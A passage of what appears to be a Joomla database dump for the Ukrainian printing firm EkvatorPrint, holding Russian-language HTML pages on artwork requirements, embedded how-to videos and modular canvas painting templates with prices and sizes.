</tr>\r\n	</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 715px; height: 53px; margin: 10px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 140%; text-align: center; padding: 10px;\">Также при подготовке макетов можно воспользоваться нашими</span> <span style=\"text-align: center; font-size: 240%; color: #0000ff;\"><strong>видеоинструкциями:</strong></span>\r\n				<p style=\"font-size: 140%; text-align: justify;\">1. Как подготовить макет для печати на холсте с натяжкой на подрамник. Как проверить размер, обрезать изображение, сделать цвета на макете более насыщенными или перевести изображение из цветного в черно-белое: <a style=\"color: #0000ff; font-size: 120%;\" href=\"printing-on-canvas#maketvideo\">https://ekvatorprint.com.ua/printing-on-canvas</a></p>\r\n				<p style=\"font-size: 140%; text-align: justify;\">2. Как подготовить несложный макет баннера за 5 минут в графическом редакторе онлайн: <a style=\"color: #0000ff; font-size: 120%;\" href=\"banner-printing#maketbannera\">https://ekvatorprint.com.ua/banner-printing</a></p>\r\n				<p style=\"font-size: 140%; text-align: justify;\">3. Как скачать фон для макета или изображение для заказа фотокартины с бесплатного фотобанка: <a style=\"color: #0000ff; font-size: 120%;\" href=\"modulnye-kartiny#fotobank\">https://ekvatorprint.com.ua/modulnye-kartiny</a></p>\r\n				<p style=\"font-size: 140%; text-align: justify;\">4. Как перевести макет в TIF или JPEG c CorelDRAW: <a style=\"color: #0000ff; font-size: 120%;\" href=\"video\">https://ekvatorprint.com.ua/video</a></p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 713px; height: 19px; background-color: #6699cc;\" border=\"0\">\r\n	<tbody>\r\n		<tr>\r\n			<td>&nbsp;</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p><br /><img style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" />Компания&nbsp;\"ЭкватрПринт\" оперативно выполнит:</p>\r\n<p>- фотопечать на холсте - печать фотографий на холсте высокого качества<br />-&nbsp;<a href=\"printing-on-vinyl\">печать наклеек</a>&nbsp;- эффективная реклама на витринах магазинов и не только<br />-&nbsp;<a href=\"banner-printing\">печать баннеров</a>&nbsp;- один из самых экономически эффективных видов наружной рекламы<br />- недорогие модульные картины - отличное украшение любого интерьера</p>\r\n<div style=\"float: left; margin-right: 10px;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</div>\r\n<div style=\"float: left; margin-right: 10px;\">&nbsp; &nbsp; &nbsp;\r\n	<div style=\"text-align: justify;\">&nbsp;</div>\r\n</div>\r\n<div style=\"display: inline-block; margin: 10px 0px 20px 0px;\">\r\n	<div style=\"text-align: justify;\">&nbsp;</div>\r\n</div>\r\n<p>&nbsp;</p>','',1,8,'2015-10-13 12:01:26',62,'','2021-07-28 12:21:20',62,62,'2021-07-28 12:21:20','2015-10-13 12:01:26','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',281,7,'Требования к макетам для печати  - ЭкваторПринт','Требования к макету для заказа широкоформатной печати.',1,94721,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(27,61,'Видео','video','<h1>Наши видеоматериалы</h1>\r\n<div style=\"display: inline-block; margin: 20px 0px 20px 0px;\">\r\n	<div style=\"float: left; margin-right: 10px;\">\r\n		<iframe src=\"https://www.youtube.com/embed/gPBGj9g3b-E\" width=\"240\" height=\"180\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n	</div>\r\n	<div style=\"float: left; margin-right: 10px;\">\r\n		<iframe src=\"https://www.youtube.com/embed/WdfNRTw1nlw\" width=\"240\" height=\"180\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n	</div>\r\n	<div style=\"float: right;\">\r\n		<iframe src=\"https://www.youtube.com/embed/KbMdSqMLzuU\" width=\"240\" height=\"180\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n	</div>\r\n</div>\r\n<div style=\"display: inline-block; margin: 10px 0px 20px 0px;\">\r\n	<div style=\"float: left; margin-right: 10px; width: 240px; font-size: 14px; font-weight: bold;\">Как поклеить пленку</div>\r\n	<div style=\"float: left; margin-right: 10px; width: 240px; font-size: 14px; font-weight: bold;\">Как подготовить макет для печати</div>\r\n	<div style=\"float: right; width: 240px; font-size: 14px; font-weight: bold;\">Как перевести макеты из CorelDraw в TIF</div>\r\n	<div style=\"margin-left: 150px; margin-top: 80px;\">\r\n		<iframe width=\"420\" height=\"237\" src=\"https://www.youtube.com/embed/Cy12eLlaYf8\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n	</div>\r\n</div>\r\n<div style=\"float: left; margin-left: 230px; width: 400px; font-size: 14px; font-weight: bold;\">Как разгладить мятый баннер</div>\r\n<div style=\"display: inline-block; margin: 10px 0px 20px 0px;\"><br />\r\n	<div>&nbsp;</div>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;&nbsp;</p>\r\n	<p>&nbsp;&nbsp;</p>\r\n	<table style=\"width: 760px; height: 21px; background-color: #6699cc;\" border=\"0\">\r\n		<tbody>\r\n			<tr>\r\n				<td>&nbsp;</td>\r\n			</tr>\r\n		</tbody>\r\n	</table>\r\n	<p><img title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" />\"ЭкваторПринт\" также оказывает следующие услуги:</p>\r\n	<p>-&nbsp;<a href=\"printing-on-canvas\">фото картины</a>&nbsp;- изготовление Вашего фото на холсте под заказ за 1-2 дня<br />-&nbsp;<a href=\"printing-on-vinyl\">печать на самоклейке</a>&nbsp;- печать наклеек любого формата интерьерного качества<br /><a href=\"banner-printing\">-&nbsp;печать постеров</a>&nbsp;- баннера для рекламы и интерьера<br /><a href=\"modulnye-kartiny\">-&nbsp;картины диптих, триптих</a>&nbsp;- стильное украшение и приятные эмоции в Вашем доме</p>\r\n</div>','',1,8,'2015-10-20 07:16:46',62,'','2021-07-04 10:06:10',62,0,'0000-00-00 00:00:00','2015-10-20 07:16:46','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',121,6,'макет для широкоформатной печати, поклейка пленки','Видеоматериалы: инструкции по эксплуатации печатной продукции, инструкции по подготовке макетов.',1,26558,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(29,80,'Модульные картины Харьков','modulnye-kartiny','<h1 style=\"text-align: center;\"><span style=\"font-size: 100%; color: #0000ff;\">Модульные картины</span></h1>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 110%;\">Компания ЭКВАТОРпринт производит&nbsp;<strong>модульные картины</strong>&nbsp;в городе<strong>&nbsp;&nbsp;Харьков&nbsp;</strong>под заказ.</span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 170%;\"><sup><span style=\"color: #ff0000;\">Срок изготовления до 2х рабочих дней.</span></sup>\r\n	</span>\r\n</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 170%;\">Осуществляем доставку во все города Украины.</span></p>\r\n<div style=\"margin: 15px;\">\r\n	<p style=\"text-align: justify; font-size: 130%;\">Картины изготавливаем путем печати на художественном холсте, натянутом на деревянный подрамник.</p>\r\n	<p style=\"text-align: center;\"><span style=\"font-size: 180%; color: #0000ff;\">Для заказа модульных картин по Вашему изображению можно воспользоваться готовым шаблоном из списка ниже.</span></p>\r\n	<p style=\"text-align: center; font-size: 150%;\"><span style=\"background-color: #ffff00;\">Для оформления заказа</span> модульной картины <span style=\"background-color: #ffff00;\">по Вашему изображению,</span> <span style=\"background-color: #ffff00;\">высылайте</span> Ваше изображение и <span style=\"background-color: #ffff00;\">номер шаблона <span style=\"font-size: 100%;\">(список шаблонов представлен ниже)</span> на</span> нашу электронную почту: <span style=\"background-color: #ffff00;\"><a href=\"mailto:e@ekvatorprint.com.ua\">e@ekvatorprint.com.ua</a>, <span style=\"background-color: #ffffff;\">после получения изображения мы вышлим Вам ответным письмом эскиз модульной картины на утверждение.</span></span>\r\n	</p>\r\n	<p style=\"text-align: justify;\">&nbsp;</p>\r\n	<h4 style=\"font-size: 230%; text-align: center; font-family: \'arial black\', sans-serif; color: #0000ff;\">Шаблоны для модульных картин:</h4>\r\n	<table style=\"width: 735px; height: 1874px;\">\r\n		<tbody>\r\n			<tr>\r\n				<td>&nbsp;</td>\r\n				<td>&nbsp;</td>\r\n				<td>&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td><img src=\"images/pimeri_shablonov/мш-3-1.png\" alt=\"трехкомпонентная модульная картина шаблон мш 3 1\" width=\"255\" height=\"159\" /></td>\r\n				<td><img src=\"images/pimeri_shablonov/мш-3-2.png\" alt=\"картина триптих шаблон мш 3 2\" width=\"244\" height=\"165\" /></td>\r\n				<td><img src=\"images/pimeri_shablonov/мш-3-3.png\" alt=\"трехкомпонентная картина шаблон мш 3 3\" width=\"214\" height=\"43\" /></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-1</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-2</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-3</strong></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<strong style=\"text-align: center;\"><span style=\"font-size: 140%;\">Цена:&nbsp;<strong><span style=\"font-size: 150%;\"><em><span style=\"color: #ff0000;\">210</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n					</strong>\r\n				</td>\r\n				<td style=\"text-align: center;\">&nbsp;<strong style=\"text-align: center;\"><span style=\"font-size: 140%;\">Цена:&nbsp;<strong><span style=\"font-size: 150%;\"><em><span style=\"color: #ff0000;\">174</span></em></span></strong><em><span style=\"color: #ff0000;\">грн</span></em></span>\r\n					</strong>\r\n				</td>\r\n				<td style=\"text-align: center;\">&nbsp;<strong style=\"text-align: center;\"><span style=\"font-size: 140%;\">Цена:&nbsp;<strong><span style=\"font-size: 150%;\"><em><span style=\"color: #ff0000;\">175</span></em></span></strong><strong style=\"text-align: center;\"><em><span style=\"color: #ff0000;\">грн</span></em></strong></span>\r\n					</strong>\r\n				</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">Разм. картины (см): 77х43</td>\r\n				<td style=\"text-align: center;\">Разм. к-ны (см):63х39</td>\r\n				<td style=\"text-align: center;\">Разм. к-ны (см): 87х20</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">Разм. модулей: 25x35, 25x35, 25x35</td>\r\n				<td style=\"text-align: center;\">Разм. модулей: 20x20, 20x40, 20x25</td>\r\n				<td style=\"text-align: center;\">Разм. модулей:20x20, 20x45, 20x20</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-3-4.png\" alt=\"шаблон модульной картины мш 3 4\" width=\"262\" height=\"108\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-3-5.png\" alt=\"трехкомпонентный шаблон мш 3 5\" width=\"224\" height=\"93\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-3-6.png\" alt=\"мш 3 6\" width=\"207\" height=\"142\" /></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-4</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-5</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-3-6</strong></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">324</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">258</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">291</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\">&nbsp;156х60</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\">&nbsp;105х40</span>&nbsp;</td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\">&nbsp;105х70</span>&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">60x35, 35x60, 60x35</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">35x40, 35x40, 35x40</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">35x35, 35x70, 35x45</span></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-4-1.png\" alt=\"четырехкомпонентная модульная картина мш 4 1\" width=\"183\" height=\"126\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-4-2.png\" alt=\"картина четырехмодульная мш 4 2\" width=\"164\" height=\"136\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-4-3.png\" alt=\"мш 4 3\" width=\"170\" height=\"150\" /></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-1</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-2</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-3</strong></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">356</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">484</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">484</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\">&nbsp;107х69</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\"> 126х110</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\"> 126х110</span></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">25x55, 25x55, 25x55, 25х55</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей: 30х45, 30х95, 30х95, 30х45</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:30х45, 30х95, 30х95, 30х45</span></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<img src=\"images/pimeri_shablonov/мш-4-4.png\" alt=\"мш 4 4\" width=\"181\" height=\"181\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-4-5.png\" alt=\"мш 4 5\" width=\"239\" height=\"97\" /><span style=\"text-align: center;\"></span><span style=\"text-align: center;\"><br /></span></td>\r\n				<td style=\"text-align: center;\">&nbsp;<img src=\"images/pimeri_shablonov/мш-4-6.png\" alt=\"мш 4 6\" width=\"203\" height=\"149\" /></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-4</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-5</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-4-6</strong></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">384</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">384</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">350</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. картины (см): 112х112</span></td>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\"></span><span style=\"text-align: center;\">Разм. к-ны (см): 166х63</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см): 126х92</span></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. модулей: 55х30, 30х55, 30х55, 55х30</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\"></span><span style=\"text-align: center;\">Разм. модулей:80х40, 20х55, 20х55, 40х30</span>&nbsp;</td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:40х30, 20х70, 20х70, 40х30</span></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-5-1.png\" alt=\"мш 5 1\" width=\"221\" height=\"134\" style=\"text-align: center;\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-5-2.png\" alt=\"пятикомпонентная модульная картина мш 5 2\" width=\"212\" height=\"116\" style=\"text-align: center;\" /></td>\r\n				<td style=\"text-align: center;\"><img src=\"images/pimeri_shablonov/мш-5-3.png\" alt=\"мш 5 3\" width=\"202\" height=\"100\" />&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-5-1</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-5-2</strong></td>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-5-3</strong></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">355</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">352</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">596</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\">&nbsp;104х60</span><span style=\"text-align: center;\"></span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\">&nbsp;133х70</span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. к-ны (см):</span><span style=\"text-align: center;\"> 208х100</span>&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">20x25, 20x45, 20x60, 20х50, 20х35</span><span style=\"text-align: center;\"></span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей:&nbsp;</span><span style=\"text-align: center;\">25x20, 25x55, 25x70, 25х40, 30х25</span><span style=\"text-align: center;\"></span></td>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. модулей: 40х40, 40х60, 40х100, 40х60, 40х40</span><span style=\"text-align: center;\"></span>&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr id=\"fotobank\">\r\n				<td style=\"text-align: center;\">&nbsp;<img src=\"images/pimeri_shablonov/мш-5-4.png\" alt=\"мш 5 4\" width=\"245\" height=\"147\" /></td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"font-size: 140%;\"></span><strong style=\"text-align: center; color: #000080; font-size: 140%;\">МШ-5-4</strong></td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><strong style=\"font-size: 140%;\">Цена: <em><span style=\"color: #ff0000; font-size: 150%;\">487</span></em></strong><em><span style=\"color: #ff0000;\">грн</span></em></td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\"><span style=\"text-align: center;\">Разм. картины (см):</span><span style=\"text-align: center;\"> 188х110</span>&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n			<tr>\r\n				<td style=\"text-align: center;\">&nbsp;<span style=\"text-align: center;\">Разм. модулей: 60х30, 20х70, 20х70, 20х70, 60х30</span><span style=\"text-align: center;\"></span></td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n				<td style=\"text-align: center;\">&nbsp;</td>\r\n			</tr>\r\n		</tbody>\r\n	</table>\r\n	<p style=\"text-align: center; font-size: 160%; color: #0000ff;\"><span style=\"font-family: \'arial black\', sans-serif;\">Как и где найти качественную картинку для печати картины:</span></p>\r\n	<div style=\"width: 710px; height: 450px; position: relative; border: 1px solid #000; background: url(\'//img.youtube.com/vi/yUX_auInYA0/maxresdefault.jpg\')  0% 0% / cover;\">\r\n		<script src=\"/media/youtube/play2.js\" type=\"text/javascript\"></script>\r\n		<div class=\"video1-play\" data-video=\"yUX_auInYA0\" onclick=\"videoplay(this);\">&nbsp;</div>\r\n	</div>\r\n	<p style=\"text-align: justify; font-size: 140%;\">Существует большое количество сайтов с которых Вы сможете скачать изображение бесплатно в отличном качестве для печати фото картин на любую тематику: города, живопись, природа, пейзажи, цветы, космос, автомобили. <strong>Найти такие сайты можно введя в поисковой системе запрос \"Обои для рабочего стола\"</strong>.</p>\r\n	<p>&nbsp;</p>\r\n	<p>&nbsp;</p>\r\n	<p style=\"text-align: center; font-size: 160%; color: #0000ff;\"><span style=\"font-family: \'arial black\', sans-serif;\">Как быстро заказать модульную картину по email:</span></p>\r\n	<div style=\"width: 710px; height: 450px; position: relative; border: 1px solid #000; background: 